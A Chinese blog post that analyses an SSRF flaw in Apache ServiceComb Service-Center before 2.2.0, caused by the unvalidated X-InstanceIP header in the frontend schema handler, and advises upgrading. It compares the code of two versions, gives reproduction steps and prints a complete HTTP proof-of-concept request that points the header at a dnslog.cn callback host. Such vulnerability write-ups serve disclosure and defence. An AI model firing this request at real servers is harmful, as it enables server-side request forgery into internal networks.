本文描述了ApacheServiceCombService-Center中的一个SSRF漏洞,攻击者利用未验证的X-InstanceIP参数构造恶意请求,可获取敏感信息。漏洞源于frontend组件的schemahandler.go文件,通过对比不同版本代码,展示了漏洞触发点并给出了复现步骤,建议升级至2.2.0及以上版本以修复此问题。
本次项目基于go语言(本人不精通),虽不是java web框架了 ,但搭建web服务的框架一些思想理念却是通用的,我们由此可以得到一些蛛丝马迹.......
目录
漏洞简介
Apache ServiceComb Service-Center是Apache基金会的 一个基于 Restful 的服务注册中心,提供微服务发现和微服务管理。
在 ServiceComb Service-Center 中的 frontend 组件的契约测试功能存在SSRF漏洞,由于未验证请求instanceIP 参数,攻击者可构造恶意请求获取敏感服务器信息。
影响范围
Apache ServiceComb Service-Center < 2.2.0
安全版本
Apache ServiceComb Service-Center 2.2.0
解决建议
升级至安全版本及其以上
项目地址
GitHub - apache/servicecomb-service-center at a0e09e1f70e818d0bbc13f43238a876279808049
漏洞分析
定位文件frontend/schema/schemahandler.go
diff 比对修改添加的地方
两个版本都从header头中提取了参数 X-InstanceIP拼接http作为url,【左:2.1.0 右:2.2.0】
最后请求了该url,区别在于2.2.0版本 对X-InstanceIP做了函数检查。那这一定是漏洞触发点!
接下来思考! 如何进入路由处理函数?
搜索关键字 SchemaHandleFunc 寻找定义路由的地方
点进去查看
没错了就是我们想要的定义 现在开始构造payload进行漏洞复现
漏洞复现
下载源码 服务开起来
开启burp访问testSchema 路径 抓包
增加头部信息,打dnslog验证
X-InstanceIP: xxxx.dnslog.cn
查看dnslog状态
漏洞验证成功
参考阿里云漏洞库
附赠poc
GET /testSchema/ HTTP/1.1
Host: 127.0.0.1:30103
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
X-InstanceIP: p5pcss.dnslog.cn
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
扫一扫
391
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
